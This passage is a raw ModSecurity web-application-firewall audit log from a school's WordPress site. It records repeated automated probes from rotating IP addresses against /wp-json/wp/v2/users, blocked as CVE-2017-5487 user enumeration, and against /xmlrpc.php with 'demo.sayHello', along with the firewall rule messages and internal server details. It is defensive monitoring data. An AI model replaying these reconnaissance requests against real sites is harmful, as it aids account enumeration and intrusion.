"%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441272925499 4104 (- - -) Stopwatch2: 1747441272925499 4104; combined=3176, p1=380, p2=2620, p3=21, p4=22, p5=78, sr=58, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa081e7e-Z-- --5a8de50e-A-- [17/May/2025:07:21:28 +0700] aCfWiHyxdQCiyU1ENFcm1QAAAAk 103.236.140.4 42696 103.236.140.4 8181 --5a8de50e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.0 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.0 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5a8de50e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a8de50e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441288319508 2816 (- - -) Stopwatch2: 1747441288319508 2816; combined=1279, p1=426, p2=823, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a8de50e-Z-- --879c531c-A-- [17/May/2025:07:21:33 +0700] aCfWjRKi5m5upc8uMd6hwgAAAM0 103.236.140.4 42700 103.236.140.4 8181 --879c531c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.0 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.0 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --879c531c-C-- demo.sayHello --879c531c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --879c531c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441293358571 5965 (- - -) Stopwatch2: 1747441293358571 5965; combined=4208, p1=562, p2=3434, p3=35, p4=40, p5=83, sr=72, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --879c531c-Z-- --7233480e-A-- [17/May/2025:07:22:09 +0700] aCfWsXyxdQCiyU1ENFcm1wAAAAs 103.236.140.4 42704 103.236.140.4 8181 --7233480e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7233480e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7233480e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441329598457 2803 (- - -) Stopwatch2: 1747441329598457 2803; combined=1166, p1=388, p2=747, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7233480e-Z-- --78f61822-A-- [17/May/2025:07:22:20 +0700] aCfWvBKi5m5upc8uMd6hxAAAAM8 103.236.140.4 42708 103.236.140.4 8181 --78f61822-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.11 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --78f61822-C-- demo.sayHello --78f61822-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --78f61822-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441340547617 4731 (- - -) Stopwatch2: 1747441340547617 4731; combined=3719, p1=453, p2=3028, p3=24, p4=25, p5=108, sr=68, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78f61822-Z-- --055db62d-A-- [17/May/2025:07:23:44 +0700] aCfXEATOsBn9MSWb6WJt6gAAAJE 103.236.140.4 42712 103.236.140.4 8181 --055db62d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --055db62d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --055db62d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441424289344 3547 (- - -) Stopwatch2: 1747441424289344 3547; combined=1500, p1=475, p2=993, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --055db62d-Z-- --94a6ca18-A-- [17/May/2025:07:23:45 +0700] aCfXEQTOsBn9MSWb6WJt6wAAAJI 103.236.140.4 42716 103.236.140.4 8181 --94a6ca18-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.180 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --94a6ca18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94a6ca18-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441425670552 2422 (- - -) Stopwatch2: 1747441425670552 2422; combined=1120, p1=379, p2=713, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94a6ca18-Z-- --5d3c5c37-A-- [17/May/2025:07:23:52 +0700] aCfXGHyxdQCiyU1ENFcm2wAAABI 103.236.140.4 42726 103.236.140.4 8181 --5d3c5c37-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.215 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5d3c5c37-C-- demo.sayHello --5d3c5c37-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d3c5c37-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441432004021 6596 (- - -) Stopwatch2: 1747441432004021 6596; combined=4800, p1=651, p2=3874, p3=38, p4=41, p5=130, sr=82, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d3c5c37-Z-- --10017118-A-- [17/May/2025:07:23:52 +0700] aCfXGBKi5m5upc8uMd6hxgAAANE 103.236.140.4 42732 103.236.140.4 8181 --10017118-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.180 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --10017118-C-- demo.sayHello --10017118-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --10017118-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441432499396 6558 (- - -) Stopwatch2: 1747441432499396 6558; combined=4776, p1=595, p2=3940, p3=38, p4=43, p5=96, sr=83, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10017118-Z-- --f441c713-A-- [17/May/2025:07:24:21 +0700] aCfXNRKi5m5upc8uMd6hxwAAANI 103.236.140.4 42742 103.236.140.4 8181 --f441c713-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f441c713-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f441c713-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441461884891 3330 (- - -) Stopwatch2: 1747441461884891 3330; combined=1455, p1=514, p2=908, p3=0, p4=0, p5=33, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f441c713-Z-- --a308a957-A-- [17/May/2025:07:24:30 +0700] aCfXPhKi5m5upc8uMd6hyAAAANM 103.236.140.4 42746 103.236.140.4 8181 --a308a957-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.174 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a308a957-C-- demo.sayHello --a308a957-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a308a957-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441470558684 5465 (- - -) Stopwatch2: 1747441470558684 5465; combined=4155, p1=533, p2=3409, p3=29, p4=31, p5=91, sr=74, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a308a957-Z-- --0ef9ef29-A-- [17/May/2025:07:24:31 +0700] aCfXPwTOsBn9MSWb6WJt7QAAAJU 103.236.140.4 42748 103.236.140.4 8181 --0ef9ef29-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.164.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.164.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0ef9ef29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ef9ef29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441471886163 2586 (- - -) Stopwatch2: 1747441471886163 2586; combined=1168, p1=392, p2=749, p3=0, p4=0, p5=27, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ef9ef29-Z-- --39559a56-A-- [17/May/2025:07:24:38 +0700] aCfXRnyxdQCiyU1ENFcm4QAAAAQ 103.236.140.4 42754 103.236.140.4 8181 --39559a56-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.164.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.164.58 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --39559a56-C-- demo.sayHello --39559a56-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --39559a56-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441478095269 5693 (- - -) Stopwatch2: 1747441478095269 5693; combined=4158, p1=558, p2=3378, p3=32, p4=35, p5=92, sr=79, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39559a56-Z-- --81cca46e-A-- [17/May/2025:07:25:22 +0700] aCfXcnyxdQCiyU1ENFcm5AAAAAo 103.236.140.4 42764 103.236.140.4 8181 --81cca46e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.255 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --81cca46e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81cca46e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441522609080 2856 (- - -) Stopwatch2: 1747441522609080 2856; combined=1492, p1=490, p2=971, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81cca46e-Z-- --9d46d846-A-- [17/May/2025:07:25:28 +0700] aCfXeATOsBn9MSWb6WJt7gAAAJY 103.236.140.4 42768 103.236.140.4 8181 --9d46d846-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.255 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9d46d846-C-- demo.sayHello --9d46d846-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d46d846-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441528278019 5098 (- - -) Stopwatch2: 1747441528278019 5098; combined=3771, p1=478, p2=3077, p3=31, p4=26, p5=93, sr=86, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d46d846-Z-- --97285742-A-- [17/May/2025:07:25:29 +0700] aCfXeXyxdQCiyU1ENFcm5gAAAAw 103.236.140.4 42770 103.236.140.4 8181 --97285742-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --97285742-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97285742-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441529377027 2859 (- - -) Stopwatch2: 1747441529377027 2859; combined=1184, p1=435, p2=720, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97285742-Z-- --3ea6591d-A-- [17/May/2025:07:25:35 +0700] aCfXf3yxdQCiyU1ENFcm6AAAABA 103.236.140.4 42776 103.236.140.4 8181 --3ea6591d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.214 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3ea6591d-C-- demo.sayHello --3ea6591d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ea6591d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441535491772 5121 (- - -) Stopwatch2: 1747441535491772 5121; combined=3862, p1=511, p2=3149, p3=28, p4=29, p5=86, sr=71, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ea6591d-Z-- --1b0bae4d-A-- [17/May/2025:07:26:28 +0700] aCfXtBKi5m5upc8uMd6hzAAAANg 103.236.140.4 42784 103.236.140.4 8181 --1b0bae4d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1b0bae4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b0bae4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure 